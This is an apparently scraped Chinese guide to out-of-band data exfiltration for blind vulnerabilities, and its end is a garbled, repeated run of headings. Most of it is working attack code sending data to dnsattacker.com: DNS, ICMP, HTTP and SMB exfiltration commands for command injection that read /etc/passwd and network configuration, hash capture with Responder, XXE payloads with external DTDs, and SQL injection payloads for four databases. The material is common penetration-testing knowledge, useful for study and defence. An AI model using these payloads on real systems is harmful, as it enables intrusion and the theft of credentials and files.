带外通道(OOB)技术全面指南<\/h1>

1. OOB技术概述<\/h2>
带外通道技术(OOB)让攻击者能够通过另一种方式来确认和利用所谓的盲目(blind)的漏洞。在这种盲目的漏洞中，攻击者无法通过恶意请求直接在响应包中看到漏洞的输出结果。<\/p>

核心原理<\/h3>

利用脆弱的实体生成带外的TCP\/UDP\/ICMP请求<\/li>
通过这个请求来提取数据<\/li>

成功基于防火墙允许出站请求的规则<\/li> <\/ul>

最佳选择<\/h3>

DNS是OOB攻击的最佳选择，因为：<\/p>

DNS请求通常被允许通过防火墙<\/li>
可以携带数据<\/li>

有成熟的工具支持<\/li> <\/ul>

2. 基础设施搭建<\/h2>

前提条件<\/h3>

具有静态IP的公网服务器<\/li>

注册域并配置DNS解析<\/li> <\/ol>

具体步骤<\/h3>

创建Linux系统(如使用GCP VPS)<\/li>

配置DNS记录：

添加Nameserver子域记录<\/li>
为nameserver添加A记录指向服务器IP<\/li> <\/ul> <\/li>

使用tcpdump监控DNS请求：

sudo tcpdump -n port 53
<\/code><\/pre>
<\/li>
<\/ol>
3. OS命令注入利用<\/h2>
检测方法<\/h3>
使用以下命令触发DNS查询：<\/p>

Windows:
nslookup test.oob.dnsattacker.com
ping ping.oob.dnsattacker.com
<\/code><\/pre>
<\/li>
Unix:
host host.oob.dnsattacker.com
dig test.oob.dnsattacker.com
<\/code><\/pre>
<\/li>
<\/ul>
数据提取技术<\/h3>
Windows系统<\/h4>


基本数据提取：<\/p>
cmd \/v \/c "hostname > temp && certutil -encode temp temp2 && findstr \/L \/V "<\/span>CERTIFICATE" temp2 > temp3 && set \/p MYVAR=<temp3 && set FINAL=!MYVAR!.oob.dnsattacker.com && nslookup !FINAL!"<\/span>
<\/span><\/span><\/code><\/pre>攻击者解码：<\/p>
echo "encoded output" | base64 -d
<\/code><\/pre>
<\/li>

大文件传输(十六进制)：<\/p>
cmd \/v \/c "ipconfig > output && certutil -encodehex -f output output.hex 4 && powershell $text=Get-Content output.hex; $subdomain=$text.replace(' ',''); $j=11111;foreach($i in $subdomain){$final=$j.tostring()+'.'+$i+'.file.oob.dnsattacker.com';$j+=1;nslookup $final}"<\/span>
<\/span><\/span><\/code><\/pre>攻击者重建数据：<\/p>
echo "0x$(cat file.txt | tr ' ' '\n' | awk '\/file.oob.dnsattacker.com\/{print $1}' | sort -u | cut -d '.' -f 2 | tr -d '\n')" | xxd -r -p
<\/code><\/pre>
<\/li>
<\/ol>
Unix系统<\/h4>


十六进制传输：<\/p>
var=<\/span>11111<\/span> &&<\/span> for<\/span> b in $(<\/span>ifconfig | xxd -p)<\/span>; do<\/span> var=<\/span>$((<\/span>var+1))<\/span> &&<\/span> dig $var.$b.file.oob.dnsattacker.com; done<\/span>
<\/span><\/span><\/code><\/pre>攻击者重建：<\/p>
echo "0x$(cat file.txt | tr ' ' '\n' | awk '\/file.oob.dnsattacker.com\/{print $1}' | sort -u | cut -d '.' -f 2 | tr -d '\n')" | xxd -r -p
<\/code><\/pre>
<\/li>

Base64传输(更高效)：<\/p>
var=<\/span>11111<\/span> &&<\/span> for<\/span> i in $(<\/span>ifconfig | base64 | awk '{gsub(\/.{50}\/,"&\n")}1'<\/span>)<\/span>; do<\/span> var=<\/span>$((<\/span>var+1))<\/span> &&<\/span> nslookup $var.$i.file.oob.dnsattacker.com; done<\/span>
<\/span><\/span><\/code><\/pre>攻击者重建：<\/p>
cat file2.txt | tr ' ' '\n' | awk '\/file.oob.dnsattacker.com\/{print $1}' | sort -u | cut -d '.' -f 2 | tr -d '\n' | base64 -d
<\/code><\/pre>
<\/li>
<\/ol>
4. 其他协议利用<\/h2>
ICMP协议<\/h3>
Windows:<\/h4>
cmd \/v \/c "ipconfig > output.txt && powershell $text=Get-Content output.txt; $ICMPClient=New-Object System.Net.NetworkInformation.Ping; $PingOptions=New-Object System.Net.NetworkInformation.PingOptions; $PingOptions.DontFragment=$True; $sendbytes=([text.encoding]::ASCII).GetBytes($text); $ICMPClient.Send('dnsattacker.com',60*1000,$sendbytes,$PingOptions);"<\/span>
<\/span><\/span><\/code><\/pre>攻击者捕获：<\/p>
sudo tcpdump 'icmp and src host [受害者IP]' -w powericmp.pcap
<\/code><\/pre>
解码：<\/p>
echo "0x$(tshark -n -q -r powericmp.pcap -T fields -e data.data | tr -d '\n' | tr -d ':')" | xxd -r -p
<\/code><\/pre>
Unix:<\/h4>
cat \/etc\/passwd | xxd -p -c 16<\/span> | while<\/span> read exfil; do<\/span> ping -p $exfil -c 1<\/span> dnsattacker.com; done<\/span>
<\/span><\/span><\/code><\/pre>攻击者捕获和解码同上。<\/p>
HTTP协议<\/h3>
Windows:<\/h4>
cmd \/v \/c "ipconfig > temp && certutil -f -encodehex temp output.hex 12 && set \/p MYVAR=<output.hex && set FINAL="<\/span>http:\/\/dnsattacker.com:9000\/!MYVAR!" && powershell Invoke-WebRequest !FINAL!"<\/span>
<\/span><\/span><\/code><\/pre>无PowerShell时使用：<\/p>
mshta !Final!
<\/code><\/pre>
攻击者解码：<\/p>
echo "0x$(ncat -lvp 9000 | grep -i get | tr -d '\/' | cut -d ' ' -f2)" | xxd -r -p
<\/code><\/pre>
Unix:<\/h4>
wget --header=<\/span>evil:$(<\/span>ifconfig | xxd -p -c 100000)<\/span> http:\/\/dnsattacker.com:9000
<\/span><\/span><\/code><\/pre>或：<\/p>
wget --post-data exfil=<\/span>'cat \/etc\/passwd'<\/span> http:\/\/dnsattacker.com
<\/span><\/span>wget --post-file trophy.php http:\/\/dnsattacker.com
<\/span><\/span>cat \/path\/to\/sensitive.txt | curl -F ":data=@-"<\/span> http:\/\/dnsattacker.com\/test.txt
<\/span><\/span><\/code><\/pre>攻击者解码：<\/p>
echo "0x$(ncat -lvp 9000 | grep -i evil | tr -d '\/' | cut -d ' ' -f2)" | xxd -r -p
<\/code><\/pre>
SMB协议(窃取哈希)<\/h3>
Windows:<\/h4>
net use h: \\dnsattacker.com\web
<\/span><\/span><\/code><\/pre>攻击者使用Responder捕获：<\/p>
sudo .\/Responder.py -I eth0
<\/code><\/pre>
或带认证的：<\/p>
net use h: \\dnsattacker.com\web \/user:{password} && copy<\/span> {file.txt to Copy} h:\{file.txt}.txt
<\/span><\/span><\/code><\/pre>5. XXE漏洞利用<\/h2>
检测<\/h3>
<?xml version="1.0"?><\/span>
<\/span><\/span><!DOCTYPE foo SYSTEM "http:\/\/xxeoob.oob.dnsattacker.com"><\/span>
<\/span><\/span><foo><\/span>&e1;<\/foo><\/span>
<\/span><\/span><\/code><\/pre>监控DNS查询确认漏洞。<\/p>
数据提取方法<\/h3>
HTTP方式<\/h4>
攻击者准备：<\/p>
python -m SimpleHttpServer 9000
<\/code><\/pre>
恶意XML：<\/p>
<?xml version="1.0" ?><\/span>
<\/span><\/span><!DOCTYPE r [
<\/span><\/span><\/span><!ELEMENT r ANY ><\/span>
<\/span><\/span><!ENTITY % sp SYSTEM "http:\/\/dnsattacker.com:9000\/linux.dtd"><\/span>
<\/span><\/span>%sp;%param1;]>
<\/span><\/span><r><\/span>&exfil;<\/r><\/span>
<\/span><\/span><\/code><\/pre>linux.dtd内容：<\/p>
<!ENTITY % data SYSTEM "file:\/\/\/etc\/passwd"><\/span>
<\/span><\/span><!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http:\/\/dnsattacker.com:9000\/%data;'><\/span>">
<\/span><\/span><\/code><\/pre>Windows版dtd：<\/p>
<!ENTITY % data SYSTEM "file:\/\/\/c:\/windows\/win.ini"><\/span>
<\/span><\/span><!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http:\/\/dnsattacker.com:9000\/%data;'><\/span>">
<\/span><\/span><\/code><\/pre>FTP方式<\/h4>
攻击者运行：<\/p>
python -m SimpleHttpServer 9000
python xxeftp.py
<\/code><\/pre>
恶意XML同上，但dtd改为：<\/p>
<!ENTITY % data SYSTEM "file:\/\/\/etc\/passwd"><\/span>
<\/span><\/span><!ENTITY % param1 "<!ENTITY exfil SYSTEM 'ftp:\/\/dnsattacker.com:2121\/%data;'><\/span>">
<\/span><\/span><\/code><\/pre>SMB方式(窃取哈希)<\/h4>
攻击者运行：<\/p>
sudo .\/Responder.py -I eth0
<\/code><\/pre>
恶意XML：<\/p>
<?xml version="1.0" encoding="ISO-8859-1"?><\/span>
<\/span><\/span><!DOCTYPE foo [
<\/span><\/span><\/span><!ELEMENT foo ANY ><\/span>
<\/span><\/span><!ENTITY xxe SYSTEM "\\dnsattacker.com\test" ><\/span>
<\/span><\/span>]>
<\/span><\/span><foo><\/span>&xxe;<\/foo><\/span>
<\/span><\/span><\/code><\/pre>其他可用payload：<\/p>
http:\/\/oob.dnsattacker.com:port\/%data
ftp:\/\/oob.dnsattacker.com:port\/%data
gopher:\/\/oob.dnsattacker.com:port\/%data
ldap:\/\/oob.dnsattacker.com:port
\\oob.dnsattacker.com\C$\1.txt
<\/code><\/pre>
6. SQL注入利用<\/h2>
Oracle数据库<\/h3>
检测：<\/p>
SELECT<\/span> DBMS_LDAP.INIT(('oob.dnsattacker.com'<\/span>,80<\/span>) FROM<\/span> DUAL;
<\/span><\/span><\/code><\/pre>数据提取：<\/p>
SELECT<\/span> DBMS_LDAP.INIT((SELECT<\/span> version<\/span> FROM<\/span> v$instance)||<\/span>'.attacker.com'<\/span>,80<\/span>) FROM<\/span> dual;
<\/span><\/span>SELECT<\/span> DBMS_LDAP.INIT((SELECT<\/span> user<\/span> FROM<\/span> dual)||<\/span>'.attacker.com'<\/span>,80<\/span>) FROM<\/span> dual;
<\/span><\/span><\/code><\/pre>替代方法(10G及以下版本)：<\/p>
UTL_INADDR.GET_HOST_ADDRESS, UTL_HTTP.REQUEST, HTTP_URITYPE.GETCLOB, DBMS_LDAP.INIT, UTL_TCP
<\/code><\/pre>
MSSQL<\/h3>
检测：<\/p>
EXEC<\/span> master..xp_dirtree('\\oob.dnsattacker.com\'<\/span>) --
<\/span><\/span><\/span><\/code><\/pre>数据提取：<\/p>
DECLARE<\/span> @<\/span>data<\/span> varchar(1024<\/span>);
<\/span><\/span>SELECT<\/span> @<\/span>data<\/span>=<\/span>(SELECT<\/span> system_user<\/span>);
<\/span><\/span>EXEC<\/span>('master..xp_dirtree "\\'<\/span>+@<\/span>data<\/span>+<\/span>'.oob.dnsattacker.com\foo$"'<\/span>);
<\/span><\/span><\/code><\/pre>其他方法：<\/p>
xp_fileexists, xp_subdirs, xp_getfiledetails, sp_add_jobstep
<\/code><\/pre>
MySQL<\/h3>
检测：<\/p>
SELECT<\/span> LOAD_FILE(CONCAT('\\\\'<\/span>,'oob.dnsattacker.com\\test.txt'<\/span>));
<\/span><\/span><\/code><\/pre>数据提取：<\/p>
SELECT<\/span> LOAD_FILE(CONCAT('\\\\'<\/span>,(SELECT<\/span> HEX(CONCAT(user<\/span>(),"\n"<\/span>))),'.oob.dnsattacker.com\\test.txt'<\/span>));
<\/span><\/span><\/code><\/pre>PostgreSQL<\/h3>
检测：<\/p>
CREATE<\/span> EXTENSION dblink;
<\/span><\/span>SELECT<\/span> dblink_connect('host=oob.dnsattacker.com user=postgres password=password dbname=dvdrental'<\/span>);
<\/span><\/span><\/code><\/pre>数据提取：<\/p>
DROP<\/span> TABLE<\/span> IF<\/span> EXISTS<\/span> table_output;
<\/span><\/span>CREATE<\/span> TABLE<\/span> table_output(content text);
<\/span><\/span>CREATE<\/span> OR<\/span> REPLACE<\/span> FUNCTION<\/span> temp_function()
<\/span><\/span>RETURNS<\/span> VOID AS<\/span> 
<\/span><\/span>$$<\/span>
<\/span><\/span>
<\/span><\/span>DECLARE<\/span> exec_cmd TEXT;
<\/span><\/span>DECLARE<\/span> query_result TEXT;
<\/span><\/span>BEGIN<\/span>
<\/span><\/span>SELECT<\/span> INTO<\/span> query_result (SELECT<\/span> encode(convert_to(concat(user<\/span>,' '<\/span>),'UTF8'<\/span>),'hex'<\/span>));
<\/span><\/span>exec_cmd:=<\/span>E'COPY table_output(content) FROM E\'<\/span>\\\\\\\\<\/span>'||query_result||E'<\/span>.oob.dnsattacker.com\\\\<\/span>foobar.txt\<\/span>''<\/span>;
<\/span><\/span>EXECUTE<\/span> exec_cmd;
<\/span><\/span>END<\/span>;
<\/span><\/span>
<\/span><\/span>$$<\/span>
<\/span><\/span> LANGUAGE<\/span> plpgsql SECURITY<\/span> DEFINER<\/span>;
<\/span><\/span>SELECT<\/span> temp_function();
<\/span><\/span><\/code><\/pre>7. 技术限制<\/h2>


域名限制：<\/p>

最多127个子域<\/li>
每个子域最多63个字符<\/li>
完整域名最大长度253字符<\/li>
<\/ul>
<\/li>

缓存问题：<\/p>

需要为每个请求添加唯一值<\/li>
<\/ul>
<\/li>

安全性：<\/p>

DNS是明文通道<\/li>
数据可能被中间节点和DNS服务器缓存<\/li>
不适用于敏感数据传输<\/li>
<\/ul>
<\/li>
<\/ol>
8. 参考资源<\/h2>

Pwning with Responder: A Pentester's Guide<\/a><\/li>
Powershell ICMP Sender<\/a><\/li>
dnscat2 Powershell<\/a><\/li>
Exfiltrating data from very isolated environments<\/a><\/li>
Data Exfiltration with DNS in SQLi Attacks<\/a><\/li>
PostgreSQL Cross Database Queries<\/a><\/li>
<\/ol>

带外通道(OOB)技术全面指南<\/h1>

1. OOB技术概述<\/h2> 带外通道技术(OOB)让攻击者能够通过另一种方式来确认和利用所谓的盲目(blind)的漏洞。在这种盲目的漏洞中，攻击者无法通过恶意请求直接在响应包中看到漏洞的输出结果。<\/p>

2. 基础设施搭建<\/h2>

3. OS命令注入利用<\/h2>

数据提取技术<\/h3>

4. 其他协议利用<\/h2>

ICMP协议<\/h3>

HTTP协议<\/h3>

SMB协议(窃取哈希)<\/h3>

5. XXE漏洞利用<\/h2>

数据提取方法<\/h3>

6. SQL注入利用<\/h2>

1. OOB技术概述<\/h2>
带外通道技术(OOB)让攻击者能够通过另一种方式来确认和利用所谓的盲目(blind)的漏洞。在这种盲目的漏洞中，攻击者无法通过恶意请求直接在响应包中看到漏洞的输出结果。<\/p>